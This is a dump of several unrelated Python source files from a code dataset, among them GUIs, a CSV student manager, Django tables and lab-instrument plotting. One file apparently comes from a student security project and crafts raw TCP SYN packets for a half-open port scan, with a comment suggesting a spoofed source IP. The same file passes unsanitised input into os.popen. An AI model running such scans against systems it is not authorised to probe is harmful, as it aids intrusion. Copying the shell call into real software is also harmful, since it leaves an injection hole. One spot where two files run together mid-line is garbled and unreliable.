(\"Open Sans\", \"10\"),\r\n width = 20,\r\n insertbackground = \"#FFFFFF\",\r\n background = \"#000000\",\r\n foreground = \"#FFFFFF\"\r\n )\r\n delegate_to_row.place(x = 150, y = 5)\r\n\r\n cooperate_with_label = tk.Label(\r\n bottom_frame,\r\n text = \"Cooperate with\",\r\n font = (\"Open Sans\", \"10\", \"bold\"),\r\n background = \"#2F3030\",\r\n foreground = \"#000000\"\r\n )\r\n cooperate_with_label.place(x = 10, y = 35)\r\n\r\n cooperate_with_row = tk.Entry(\r\n bottom_frame,\r\n font = (\"Open Sans\", \"10\"),\r\n width = 20,\r\n insertbackground = \"#FFFFFF\",\r\n background = \"#000000\",\r\n foreground = \"#FFFFFF\"\r\n )\r\n cooperate_with_row.place(x = 150, y = 35)\r\n\r\n see_task_win.protocol(\"WM_DELETE_WINDOW\", exit_see_task)\r\n insert_values()\r\n\r\n\r\n choose_button = tk.Button(\r\n delegated_tasks_list_win,\r\n text = \"CHOOSE TASK\",\r\n font = ('Arial', '10', 'bold'),\r\n width = 11,\r\n command = see_task_in_tasks_list,\r\n background = '#970000',\r\n foreground = '#FFFFFF'\r\n )\r\n choose_button.place(x = 450, y =250)\r\n\r\n\r\n treeview.set_children('', *sorted(treeview.get_children(''), key=compare_dates))\r\n\r\n","repo_name":"RealLifeGeek/Time-Management-System","sub_path":"delegated_tasks_list_database.py","file_name":"delegated_tasks_list_database.py","file_ext":"py","file_size_in_byte":18474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32159158408","text":"from pyraf import iraf\nimport os,shutil\nimport numpy as np\n\ndef expand_name(Files):\n if '-' in Files:\n part_Files=Files.replace('-',' ').split()\n N=1-int(part_Files[0][-3:])+int(part_Files[1])\n name_expand=[]\n for i in range(N):\n name_expand.append([])\n name_expand[-1]=part_Files[0][:-3]+'-'+str(int(part_Files[0][-3:])+i).zfill(4)+'.fit'\n else:\n name_expand=Files[:-3]+'-'+str(Files[-3:]).zfill(4)+'.fit';\n N=1\n return N,name_expand\n\ndef expand_inf_file(inf_file):\n N=expand_name(inf_file[-1][0])[0]\n name_expand=expand_name(inf_file[-1][0])[1]\n list_inf_tail=inf_file[-1][1:]\n if N > 1:\n for i in range(N): \n inf_file[-1]=[name_expand[i]]+list_inf_tail\n if i>16) + (s & 0xffff)\n #s = s + (s >> 16)\n #complement and mask to 4 byte short\n s = ~s & 0xffff\n return s\n\n @staticmethod\n def get_ip_from_hostname(interface, adress):\n try:\n s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)\n except socket.error as msg:\n print('Socket could not be created. Error Code : ' + str(msg[0]) + ' Message ' + msg[1])\n # sys.exit()\n\n s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)\n return s.gethostbyname_ex(adress)\n\n\n @staticmethod\n def half_port_scan(source_ip, target_ip, start_port, end_port):\n try:\n s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)\n except socket.error as msg:\n print('Socket could not be created. Error Code : ' + str(msg[0]) + ' Message ' + msg[1])\n # sys.exit()\n\n for i in range(start_port, end_port):\n # time.sleep(1)\n s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)\n packet = ''\n source_ip = source_ip\n destination_ip = target_ip\n ihl = 5\n version = 4\n tos = 0\n tot_len = 20\n id = 54321 #Id of this packet\n frag_off = 0\n ttl = 44\n protocol = socket.IPPROTO_TCP\n check = 10 # python seems to correctly fill the checksum\n saddr = socket.inet_aton(source_ip) #Spoof the source ip address if you want to\n daddr = socket.inet_aton(destination_ip)\n ihl_version = (version << 4) + ihl\n ip_header = struct.pack('!BBHHHBBH4s4s', ihl_version, tos, tot_len, id, frag_off, ttl, protocol, check, saddr, daddr)\n source = 12345 # source port\n dest = i # destination port\n seq = 0\n ack_seq = 0\n doff = 5 #4 bit field, size of tcp header, 5 * 4 = 20 bytes\n fin = 0\n syn = 1\n rst = 0\n psh = 0\n ack = 0\n urg = 0\n window = socket.htons(5840)\n check = 0\n urg_ptr = 0\n offset_res = (doff << 4) + 0\n tcp_flags = fin + (syn << 1) + (rst << 2) + (psh << 3) + (ack << 4) + (urg << 5)\n tcp_header = struct.pack('!HHLLBBHHH', source, dest, seq, ack_seq, offset_res, tcp_flags, window, check, urg_ptr)\n source_address = socket.inet_aton(source_ip)\n dest_address = socket.inet_aton(destination_ip)\n placeholder = 0\n protocol = socket.IPPROTO_TCP\n tcp_length = len(tcp_header)\n psh = struct.pack('!4s4sBBH', source_address, dest_address, placeholder, protocol, tcp_length)\n psh += tcp_header\n tcp_checksum = NetworkUtils.checksum_tcp(psh)\n tcp_header = struct.pack('!HHLLBBHHH', source, dest, seq, ack_seq, offset_res, tcp_flags, window, tcp_checksum, urg_ptr)\n packet = ip_header + tcp_header\n s.sendto(packet, (destination_ip, 0))\n\n @staticmethod \n def get_ip(interface): \n f = os.popen('ifconfig ' + interface + ' | grep \"inet\\ addr\" | cut -d: -f2 | cut -d\" \" -f1') \n your_ip = f.read() \n return your_ip\n\n @staticmethod\n def checksum_icmp(source_string):\n \"\"\"\n AUTHOR: https://github.com/samuel/python-ping/blob/master/ping.py\n I'm not too confident that this is right but testing seems\n to suggest that it gives the same answers as in_cksum in ping.c\n \"\"\"\n sum = 0\n countTo = (len(source_string)/2)*2\n count = 0\n while count> 16) + (sum & 0xffff)\n sum = sum + (sum >> 16)\n answer = ~sum\n answer = answer & 0xffff\n\n # Swap bytes. Bugger me if I know why.\n answer = answer >> 8 | (answer << 8 & 0xff00)\n\n return answer\n\n @staticmethod\n def get_result(probe_name, interface, zielip):\n if probe_name == \"ICMPProbe\":\n result = NetworkUtils.receive_icmp(interface, zielip)\n elif probe_name == \"TCPProbe\":\n result = NetworkUtils.receive_tcp(interface, zielip)\n else:\n result = [\"Something went wrong\", probe_name]\n\n return result\n","repo_name":"eliasarnold/internetandsecurityproject","sub_path":"src/NetworkUtils.py","file_name":"NetworkUtils.py","file_ext":"py","file_size_in_byte":7362,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14206044613","text":"import csv\r\n\r\ndef add_student():\r\n with open('students.csv', 'a', newline='') as file:\r\n writer = csv.writer(file)\r\n name = input(\"Enter the student's name: \")\r\n id_number = input(\"Enter the student's ID number: \")\r\n age = input(\"Enter the student's age: \")\r\n grade = input(\"Enter the student's grade: \")\r\n course_code = input(\"Enter the course code: \")\r\n writer.writerow([name, id_number, age, grade, course_code])\r\n print(\"Student added successfully\")\r\n\r\ndef edit_student():\r\n students = []\r\n with open('students.csv', 'r') as file:\r\n reader = csv.reader(file)\r\n for row in reader:\r\n students.append(row)\r\n name = input(\"Enter the name of the student you want to edit: \")\r\n for student in students:\r\n if student[0] == name:\r\n student[1] = input(\"Enter the new ID number: \")\r\n student[2] = input(\"Enter the new age: \")\r\n student[3] = input(\"Enter the new grade: \")\r\n student[4] = input(\"Enter the new course code: \")\r\n with open('students.csv', 'w', newline='') as file:\r\n writer = csv.writer(file)\r\n writer.writerows(students)\r\n print(\"Student edited successfully\")\r\n return\r\n print(\"Student not found\")\r\n\r\ndef delete_student():\r\n students = []\r\n with open('students.csv', 'r') as file:\r\n reader = csv.reader(file)\r\n for row in reader:\r\n students.append(row)\r\n name = input(\"Enter the name of the student you want to delete: \")\r\n for student in students:\r\n if student[0] == name:\r\n students.remove(student)\r\n with open('students.csv', 'w', newline='') as file:\r\n writer = csv.writer(file)\r\n writer.writerows(students)\r\n print(\"Student deleted successfully\")\r\n return\r\n print(\"Student not found\")\r\n\r\ndef display_students():\r\n with open('students.csv', 'r') as file:\r\n reader = csv.reader(file)\r\n for row in reader:\r\n print(*row, sep='\\t')\r\n\r\n# Course-related functions\r\ndef add_course():\r\n with open('courses.csv', 'a', newline='') as file:\r\n writer = csv.writer(file)\r\n course_name = input(\"Enter the name of the course: \")\r\n course_code = input(\"Enter the course code: \")\r\n course_instructor = input(\"Enter the name of the instructor: \")\r\n writer.writerow([course_name, course_code, course_instructor])\r\n print(\"Course added successfully\")\r\n\r\ndef edit_course():\r\n courses = []\r\n with open('courses.csv', 'r') as file:\r\n reader = csv.reader(file)\r\n for row in reader:\r\n courses.append(row)\r\n course_name = input(\"Enter the name of the course you want to edit: \")\r\n for course in courses:\r\n if course[0] == course_name:\r\n course[1] = input(\"Enter the new course code: \")\r\n course[2] = input(\"Enter the new instructor name: \")\r\n with open('courses.csv', 'w', newline='') as file:\r\n writer = csv.writer(file)\r\n writer.writerows(courses)\r\n print(\"Course edited successfully\")\r\n return\r\n print(\"Course not found\")\r\n\r\ndef delete_course():\r\n courses = []\r\n with open('courses.csv', 'r') as file:\r\n reader = csv.reader(file)\r\n for row in reader:\r\n courses.append(row)\r\n course_name = input(\"Enter the name of the course you want to delete: \")\r\n for course in courses:\r\n if course[0] == course_name:\r\n courses.remove(course)\r\n with open('courses.csv', 'w', newline='') as file:\r\n writer = csv.writer(file)\r\n writer.writerows(courses)\r\n print(\"Course deleted successfully\")\r\n return\r\n print(\"Course not found\")\r\n\r\ndef display_courses():\r\n with open('courses.csv', 'r') as file:\r\n reader = csv.reader(file)\r\n for row in reader:\r\n print(row[0], row[1], row[2], sep='\\t')\r\n\r\nwhile True:\r\n print(\"1. Add student\")\r\n print(\"2. Edit student\")\r\n print(\"3. Delete student\")\r\n print(\"4. Display students\")\r\n print(\"5. Add course\")\r\n print(\"6. Edit course\")\r\n print(\"7. Delete course\")\r\n print(\"8. Display courses\")\r\n print(\"9. Exit\")\r\n\r\n choice = input(\"Enter your choice: \")\r\n\r\n if choice == '1':\r\n add_student()\r\n elif choice == '2':\r\n edit_student()\r\n elif choice == '3':\r\n delete_student()\r\n elif choice == '4':\r\n display_students()\r\n elif choice == '5':\r\n add_course()\r\n elif choice == '6':\r\n edit_course()\r\n elif choice == '7':\r\n delete_course()\r\n elif choice == '8':\r\n display_courses()\r\n elif choice == '9':\r\n break\r\n else:\r\n print(\"Invalid choice. Please try again.\")\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"edenDorato27/CCC151-SSIS","sub_path":"SSIS_CSV.py","file_name":"SSIS_CSV.py","file_ext":"py","file_size_in_byte":4889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37237340518","text":"## @package Config.BaseConfig\r\n# Base class for all worlds.\r\n\r\nfrom Enviroment.Affordances import *\r\nfrom Enviroment.Objects import *\r\nfrom Agents.Intentions import Intentions, Intention\r\nfrom Agents.Processes import Processes, Process\r\nfrom Agents.Scenarios import Scenario\r\n\r\n## Base class for all worlds, implements common tasks.\r\nclass BaseConfig:\r\n def __init__(self):\r\n self.intentions = Intentions()\r\n self.processes = Processes()\r\n self.scenario = Scenario()\r\n \r\n ## Populates self.intentions and self.processes. \r\n def prepareProcessIntentionsItems(self):\r\n P_Eat = Process(\"Eating\", [], [Eatability], [Eatability], [], 1800)\r\n self.processes.AddProcess(P_Eat)\r\n I_Eat = Intention(\"Eat\", [P_Eat])\r\n self.intentions.AddIntention(I_Eat)\r\n \r\n P_Drink = Process(\"Drinking\", [], [Drinkability], [Drinkability], [], 60)\r\n self.processes.AddProcess(P_Drink)\r\n I_Drink = Intention(\"Drink\", [P_Drink])\r\n self.intentions.AddIntention(I_Drink)\r\n \r\n P_Smoke = Process(\"Smoking\", [], [Smokeability], [], [], 300)\r\n self.processes.AddProcess(P_Smoke)\r\n I_Smoke = Intention(\"Smoke\", [P_Smoke])\r\n self.intentions.AddIntention(I_Smoke)\r\n \r\n P_Read = Process(\"Reading\", [], [Readability], [], [], 4000)\r\n self.processes.AddProcess(P_Read)\r\n I_Read = Intention(\"Read\", [P_Read])\r\n self.intentions.AddIntention(I_Read)\r\n \r\n P_Wash = Process(\"Washing\", [], [Washability], [Wetability], [], 600)\r\n self.processes.AddProcess(P_Wash)\r\n I_Wash = Intention(\"Wash\", [P_Wash])\r\n self.intentions.AddIntention(I_Wash)\r\n \r\n P_Heat = Process(\"Heating\", [], [Fireability], [Fireability], [], 1200)\r\n self.processes.AddProcess(P_Heat)\r\n I_Heat = Intention(\"Heat\", [P_Heat])\r\n self.intentions.AddIntention(I_Heat)\r\n \r\n P_Watch = Process(\"Watching\", [], [Watchability], [], [], 4000)\r\n self.processes.AddProcess(P_Watch)\r\n I_Watch = Intention(\"Watch\", [P_Watch])\r\n self.intentions.AddIntention(I_Watch)\r\n \r\n P_Play = Process(\"Playing\", [], [Playability], [], [], 900)\r\n self.processes.AddProcess(P_Play)\r\n I_Play = Intention(\"Play\", [P_Play])\r\n self.intentions.AddIntention(I_Play)\r\n \r\n P_Sit = Process(\"Sitting\", [], [Sitability], [], [], 1200)\r\n self.processes.AddProcess(P_Sit)\r\n I_Sit = Intention(\"Sit\", [P_Sit])\r\n self.intentions.AddIntention(I_Sit)\r\n \r\n P_Repair = Process(\"Repairing\", [], [Repairability], [], [], 600)\r\n self.processes.AddProcess(P_Repair)\r\n I_Repair = Intention(\"Repair\", [P_Repair])\r\n self.intentions.AddIntention(I_Repair)\r\n \r\n P_Nail = Process(\"Nailing\", [], [Nailability], [Nailability], [], 120)\r\n self.processes.AddProcess(P_Nail)\r\n I_Nail = Intention(\"Nail\", [P_Nail])\r\n self.intentions.AddIntention(I_Nail)\r\n \r\n ## Creates list of high-level intentioins used for pre-generting agent's scenrio. Override in subclasses.\r\n def prepareProcessIntentions(self): \r\n self.intentions.AddHighLevelIntention(\"Eat\")\r\n self.intentions.AddHighLevelIntention(\"Drink\")\r\n self.intentions.AddHighLevelIntention(\"Smoke\")\r\n self.intentions.AddHighLevelIntention(\"Read\")\r\n self.intentions.AddHighLevelIntention(\"Wash\")\r\n self.intentions.AddHighLevelIntention(\"Heat\")\r\n self.intentions.AddHighLevelIntention(\"Watch\")\r\n self.intentions.AddHighLevelIntention(\"Play\")\r\n self.intentions.AddHighLevelIntention(\"Sit\")\r\n self.intentions.AddHighLevelIntention(\"Repair\")\r\n self.intentions.AddHighLevelIntention(\"Nail\")\r\n \r\n ## Pre-generates agent's scenario.\r\n def prepareScenario(self): \r\n self.scenario = Scenario()\r\n self.scenario.Generate(self.intentions)\r\n \r\n ## Sets agents intentions, processes and scenario to ActionSelector. Called from ActionSelector.\r\n def GetAgentIntentions(self, actionSelector):\r\n self.intentions = Intentions()\r\n self.processes = Processes()\r\n self.scenario = Scenario()\r\n \r\n self.prepareProcessIntentionsItems()\r\n self.prepareProcessIntentions()\r\n self.prepareScenario()\r\n \r\n actionSelector.processes = self.processes\r\n actionSelector.intentions = self.intentions\r\n actionSelector.scenario = self.scenario\r\n \r\n ## Creates world. Override in subclasses. \r\n def prepareMap(self, map):\r\n pass\r\n \r\n ## Creates world's future history. Override in subclasses.\r\n def GetWorldsEvents(self):\r\n return []\r\n\r\n ## Creates world.\r\n def SetUpMap(self, map):\r\n self.prepareMap(map)\r\n \r\n","repo_name":"jakubkotrla/spacemap","sub_path":"src/Config/BaseConfig.py","file_name":"BaseConfig.py","file_ext":"py","file_size_in_byte":4934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17707550363","text":"import django_tables2 as tables\nfrom . import models\n\n\n\n\nclass ClientTable(tables.Table):\n\n class Meta:\n model = models.Client\n template_name = \"django_tables2/bootstrap.html\"\n fields = (\"id\",\"nom\",\"prenom\",\"adresse\",\"tel\",\"sexe\",\"chiffre_affaire\",\"actions\")\n\nclass FactureTable(tables.Table):\n class Meta:\n model = models.Facture\n template_name = \"django_tables2/bootstrap.html\"\n fields = ('id','date','total')\n\n\nclass FournisseurTable(tables.Table):\n\n class Meta:\n model = models.Fournisseur\n template_name = \"django_tables2/bootstrap.html\"\n fields = ('id','nom','actions')\n \nclass FournisseurWithChiffreAffaireTable(tables.Table):\n class Meta:\n model = models.Fournisseur\n template_name = \"django_tables2/bootstrap.html\"\n fields = ('nom','chiffre_affaire')\n\nclass ClientWithChiffreAffaireTable(tables.Table):\n class Meta:\n model = models.Client\n template_name = \"django_tables2/bootstrap.html\"\n fields = ('nom','prenom','chiffre_affaire')\n\n","repo_name":"LydiaBenaida/Bill_project","sub_path":"billApp/tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30581540656","text":"def solution(heights):\n answer = []\n sign = 0\n for i in range(len(heights)-1,-1,-1) :\n sw = 0\n for j in range(i,-1,-1) :\n if heights[j] > heights[i] :\n answer.insert(0,j+1)\n sw = 1\n break\n if sw == 0 :\n answer.insert(0,0)\n \n print(answer)\n return answer\n\nsolution([6,9,5,7,4]) #[0,0,2,2,4]\nsolution([3,9,9,3,5,7,2]) #[0,0,0,3,3,3,6]\nsolution([1,5,3,6,7,6,5]) #[0,0,2,0,0,5,6]","repo_name":"Keunyoung-Jung/Algrithm","sub_path":"top_signal.py","file_name":"top_signal.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13380241508","text":"from common import csv_utils, uuid_generator\nimport os\nfrom tqdm import tqdm\n\nfrom db import db_access\nfrom entities.needs_and_initiatives import Organization\n\n\ndef _create_organization_entity(data_dict: dict):\n try:\n year_of_founding = int(data_dict['שנת הקמה'])\n except ValueError:\n year_of_founding = -1\n data = Organization(\n id=str(uuid_generator.generate_uuid()),\n timestamp=data_dict['Timestamp'],\n org_name=data_dict['שם הארגון'],\n contact_name=data_dict['איש קשר'],\n phone_number=data_dict['טלפון'],\n city=data_dict['עיר'],\n address=data_dict['כתובת'],\n email=data_dict['אימייל'],\n donation_type=data_dict['סוג תרומה'],\n org_size=data_dict['גודל הארגון'],\n year_of_founding=year_of_founding,\n role=data_dict['תפקיד'],\n org_logo=data_dict['לוגו של הארגון'],\n org_description=data_dict['כמה מילים על הארגון'],\n resource_needs=data_dict['משאבים נדרשים להמשך פעילות'],\n additional_info=data_dict['פרטים נוספים'],\n our_contact_name=data_dict['שם המתנדב מטעמנו (מתחברים)'],\n notes_for_donation=data_dict['הערות לתרומה'],\n our_contact_phone_number=data_dict['טלפון המתנדב מטעמנו (מתחברים)'],\n ask_or_give=data_dict['מבקשים/מציעים תרומה'],\n )\n return data\n\n\ndef migrate(csv_file_path: str):\n rows = csv_utils.load_csv(csv_file_path=csv_file_path)\n for row in tqdm(rows):\n organization_entity = _create_organization_entity(row)\n for donation_type in organization_entity.donation_type.split(\",\"):\n donation_type = donation_type.strip()\n\n db_access.insert_organzation(entity=organization_entity)\n\n\n\nif __name__ == '__main__':\n file_path = os.path.expanduser('~/Downloads/mithabrim_sheet.csv')\n migrate(file_path)","repo_name":"yonatanmaor/mithabrim","sub_path":"src/migrations/migrate_needs_and_initiatives_sheet_to_db.py","file_name":"migrate_needs_and_initiatives_sheet_to_db.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"he","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41100707693","text":"from tkinter import *\r\nfrom matplotlib.figure import Figure \r\nfrom matplotlib.backends.backend_tkagg import (FigureCanvasTkAgg, \r\nNavigationToolbar2Tk) \r\nimport random\r\nimport math\r\nimport tkinter.font as font\r\nimport pyvisa\r\nimport time\r\nfrom matplotlib import ticker\r\nimport numpy as np\r\n\r\nrec = False\r\npltSec = False\r\nfilename = \"5_11_dummy6.txt\"\r\nIset = 1.0\r\nbooli = True\r\n\r\ndef openDev(rm):\r\n srs = rm.open_resource('GPIB0::10::INSTR')\r\n print(srs.query('*IDN?'))\r\n dsp = rm.open_resource('GPIB0::12::INSTR')\r\n print(dsp.query('*IDN?'))\r\n therm = rm.open_resource('GPIB0::13::INSTR')\r\n print(therm.query('*IDN?'))\r\n isou = rm.open_resource('GPIB0::25::INSTR')\r\n isou.read_termination = '\\r'\r\n return srs, dsp, therm, isou\r\n\r\ndef getData(srs, dsp, therm, isou):\r\n srs.clear()\r\n srsR = float(srs.query('OUTP ? 3'))\r\n srsT = float(srs.query('OUTP ? 4'))\r\n \r\n dsp.clear()\r\n DSPstr = dsp.query('MP.')\r\n vals = DSPstr.split(\",\")\r\n try:\r\n dspR = float(vals[0])\r\n dspT = float(vals[1])\r\n except ValueError:\r\n dspR = 0.0\r\n dspT = 0.0\r\n \r\n tempA = float(therm.query('INPUT A:TEMPER?'))\r\n \r\n isou.clear()\r\n Inow = isou.query('R0\\r')\r\n istuff = Inow.split(\"R\")\r\n Ival = float(istuff[1])\r\n \r\n retVal = np.asarray([Ival, tempA, srsR, srsT, dspR, dspT], dtype=float)\r\n return retVal\r\n\r\ndef setMax(isou, maxi):\r\n stri = 'I' + str(maxi) + '\\r'\r\n isou.write(stri)\r\n isou.read()\r\n \r\ndef setSign(isou, booli):\r\n if(booli):\r\n isou.write('P1\\r')\r\n isou.read()\r\n else:\r\n isou.write('P2\\r')\r\n isou.read()\r\n time.sleep(.25)\r\n \r\ndef startRamp(isou):\r\n isou.write('A0\\r')\r\n isou.read()\r\n time.sleep(.25)\r\n isou.write('A1\\r')\r\n isou.read()\r\n \r\ndef hold(isou):\r\n isou.write('A0\\r')\r\n isou.read()\r\n \r\nrm = pyvisa.ResourceManager()\r\nprint(rm.list_resources())\r\nsrs, dsp, therm, isou= openDev(rm)\r\n\r\ndef recent():\r\n global rec\r\n global pltSec\r\n rec = True\r\n pltSec = False\r\n\r\ndef sec():\r\n global rec\r\n global pltSec\r\n pltSec = True\r\n rec = False\r\n \r\ndef base(): \r\n global rec\r\n global pltSec\r\n rec = False\r\n pltSec = False\r\n\r\ndef plot():\r\n global output, fig\r\n clear_plot()\r\n \r\n fig = Figure(figsize = (w/100, h/100), dpi = 100)\r\n # adding the subplot \r\n plot1 = fig.add_subplot(2,3,1) \r\n plot2 = fig.add_subplot(2,3,2) \r\n plot3 = fig.add_subplot(2,3,3) \r\n plot4 = fig.add_subplot(2,3,4)\r\n plot5 = fig.add_subplot(2,3,5) \r\n plot6 = fig.add_subplot(2,3,6) \r\n\r\n # plotting the graph \r\n plot1.plot(x, y1, '-') \r\n plot2.plot(x, y2, '-') \r\n plot3.plot(x, y3, '-') \r\n plot4.plot(x, y4, '-') \r\n plot5.plot(x, y5, '-') \r\n plot6.plot(x, y6, '-')\r\n \r\n plot1.set_title('I')\r\n plot2.set_title('Temp')\r\n plot3.set_title('R SRS')\r\n plot4.set_title('Theta SRS')\r\n plot5.set_title('R DSP')\r\n plot6.set_title('Theta DSP')\r\n \r\n output = FigureCanvasTkAgg(fig, master = canvas)\r\n output.draw()\r\n\r\n # placing the canvas on the Tkinter window \r\n output.get_tk_widget().pack()\r\n \r\ndef plotR():\r\n global output, fig\r\n clear_plot()\r\n \r\n vals = e1.get()\r\n try:\r\n val = int(vals)\r\n except ValueError:\r\n val = 0\r\n \r\n fig = Figure(figsize = (w/100, h/100), dpi = 100)\r\n # adding the subplot \r\n plot1 = fig.add_subplot(2,3,1) \r\n plot2 = fig.add_subplot(2,3,2) \r\n plot3 = fig.add_subplot(2,3,3) \r\n plot4 = fig.add_subplot(2,3,4)\r\n plot5 = fig.add_subplot(2,3,5) \r\n plot6 = fig.add_subplot(2,3,6) \r\n \r\n \r\n # plotting the graph\r\n PlotPart = True\r\n if(math.isnan(val)):\r\n PlotPart = False\r\n else:\r\n if(val < 2):\r\n PlotPart = False\r\n if(val > len(x)):\r\n PlotPart = False\r\n \r\n if(not PlotPart):\r\n plot1.plot(x, y1, '-') \r\n plot2.plot(x, y2, '-') \r\n plot3.plot(x, y3, '-') \r\n plot4.plot(x, y4, '-') \r\n plot5.plot(x, y5, '-') \r\n plot6.plot(x, y6, '-')\r\n lab.config(text = 'Invalid Bound, Plotting All')\r\n \r\n else:\r\n plot1.plot(x[-val:], y1[-val:], '-') \r\n plot2.plot(x[-val:], y2[-val:], '-') \r\n plot3.plot(x[-val:], y3[-val:], '-') \r\n plot4.plot(x[-val:], y4[-val:], '-') \r\n plot5.plot(x[-val:], y5[-val:], '-') \r\n plot6.plot(x[-val:], y6[-val:], '-')\r\n lab.config(text = 'Plotting Recent ' + str(val))\r\n \r\n plot1.set_title('I')\r\n plot2.set_title('Temp')\r\n plot3.set_title('R SRS')\r\n plot4.set_title('Theta SRS')\r\n plot5.set_title('R DSP')\r\n plot6.set_title('Theta DSP')\r\n \r\n output = FigureCanvasTkAgg(fig, master = canvas)\r\n output.draw()\r\n\r\n # placing the canvas on the Tkinter window \r\n output.get_tk_widget().pack()\r\n\r\ndef plotSec():\r\n global output, fig\r\n clear_plot()\r\n \r\n valL = e2.get()\r\n valR = e3.get()\r\n try:\r\n left = int(valL)\r\n except ValueError:\r\n left = 0\r\n \r\n try:\r\n right = int(valR)\r\n except ValueError:\r\n right = len(x)\r\n \r\n fig = Figure(figsize = (w/100, h/100), dpi = 100)\r\n # adding the subplot \r\n plot1 = fig.add_subplot(2,3,1) \r\n plot2 = fig.add_subplot(2,3,2) \r\n plot3 = fig.add_subplot(2,3,3) \r\n plot4 = fig.add_subplot(2,3,4)\r\n plot5 = fig.add_subplot(2,3,5) \r\n plot6 = fig.add_subplot(2,3,6) \r\n \r\n \r\n # plotting the graph\r\n PlotPart = True\r\n if(math.isnan(left) or math.isnan(right)):\r\n PlotPart = False\r\n else:\r\n if(left < 2 or right < 2):\r\n PlotPart = False\r\n if(left > len(x)):\r\n PlotPart = False\r\n if(right > len(x)):\r\n right = len(x)\r\n if(right - left < 2):\r\n PlotPart = False\r\n \r\n \r\n if(not PlotPart):\r\n plot1.plot(x, y1, '-') \r\n plot2.plot(x, y2, '-') \r\n plot3.plot(x, y3, '-') \r\n plot4.plot(x, y4, '-') \r\n plot5.plot(x, y5, '-') \r\n plot6.plot(x, y6, '-')\r\n lab.config(text = 'Invalid Bounds, Plotting All')\r\n \r\n else:\r\n plot1.plot(x[left:right], y1[left:right], '-') \r\n plot2.plot(x[left:right], y2[left:right], '-') \r\n plot3.plot(x[left:right], y3[left:right], '-') \r\n plot4.plot(x[left:right], y4[left:right], '-') \r\n plot5.plot(x[left:right], y5[left:right], '-') \r\n plot6.plot(x[left:right], y6[left:right], '-')\r\n lab.config(text = 'Plotting Section ' + str(left) + ' to ' + str(right))\r\n \r\n plot1.set_title('I')\r\n plot2.set_title('Temp')\r\n plot3.set_title('R SRS')\r\n plot4.set_title('Theta SRS')\r\n plot5.set_title('R DSP')\r\n plot6.set_title('Theta DSP')\r\n \r\n output = FigureCanvasTkAgg(fig, master = canvas)\r\n output.draw()\r\n\r\n # placing the canvas on the Tkinter window \r\n output.get_tk_widget().pack()\r\n\r\ndef clear_plot():\r\n global output\r\n if output:\r\n for child in canvas.winfo_children():\r\n child.destroy()\r\n # or just use canvas.winfo_children()[0].destroy() \r\n \r\n output = None\r\n \r\ndef get_data(index):\r\n global booli\r\n global Iset\r\n loops = 5\r\n x.append(index)\r\n ret = getData(srs, dsp, therm, isou)\r\n y1.append(ret[0])\r\n y2.append(ret[1])\r\n y3.append(ret[2])\r\n y4.append(ret[3])\r\n y5.append(ret[4])\r\n y6.append(ret[5])\r\n \r\n if(np.abs(ret[0]) == Iset):\r\n booli = not booli\r\n setSign(isou, booli)\r\n startRamp(isou)\r\n \r\n file = open(filename,\"a\")\r\n file.writelines(str(index) + ' ')\r\n for dat in ret:\r\n file.writelines(str(dat) + ' ')\r\n file.write(\"\\n\")\r\n file.close()\r\n \r\n if(index % loops == 0):\r\n if(rec == False and pltSec == False):\r\n plot()\r\n lab.config(text = 'Plotting All')\r\n if(rec == True and pltSec == False):\r\n plotR()\r\n if(pltSec == True):\r\n plotSec()\r\n window.after(1000, get_data, index + 1)\r\n \r\n\r\n# the main Tkinter window \r\nwindow = Tk() \r\n\r\noutput = None\r\nfig = None\r\n\r\nx = []\r\ny1 = []\r\ny2 = []\r\ny3 = []\r\ny4 = [] \r\ny5 = []\r\ny6 = []\r\n# setting the title \r\nwindow.title('Plotting in Tkinter') \r\n\r\n# dimensions of the main window \r\nwindow.geometry(\"1800x800\") \r\n\r\nw = 1750\r\nh = 750\r\n\r\ncanvas = Canvas(window, width=w, height=h, bg='white') \r\ncanvas.pack()\r\n\r\nmyFont = font.Font(family='Helvetica', size=20, weight='bold')\r\noutFont = font.Font(family='Helvetica', size=20, weight='bold')\r\n\r\nBB = Button(window, text=\"Plot All\", command=base, bg='green', fg='white')\r\nBB['font'] = myFont\r\nBB.pack(side = LEFT)\r\n\r\nmyButton = Button(window, text=\"Plot Recent\", command=recent, bg='yellow')\r\nmyButton['font'] = myFont\r\nmyButton.pack(side = LEFT)\r\n\r\ne1 = Entry(window, width=10)\r\ne1['font'] = outFont\r\ne1.pack(side = LEFT)\r\n\r\nBut2 = Button(window, text=\"Plot From Index A to B\", command=sec, bg='yellow')\r\nBut2['font'] = myFont\r\nBut2.pack(side = LEFT)\r\n\r\ne2 = Entry(window, width=10)\r\ne2['font'] = outFont\r\ne2.pack(side = LEFT)\r\n\r\ne3 = Entry(window, width=10)\r\ne3['font'] = outFont\r\ne3.pack(side = LEFT)\r\n\r\nlab = Label(window, text='Plotting All', bg = 'light blue')\r\nlab['font'] = myFont\r\nlab.pack(side=LEFT)\r\n\r\nwindow.after(100, get_data, 0)\r\n\r\n\r\nsetMax(isou, Iset)\r\ntime.sleep(.25)\r\nsetSign(isou, booli)\r\ntime.sleep(.25)\r\nstartRamp(isou)\r\ntime.sleep(.25)\r\n\r\n# run the 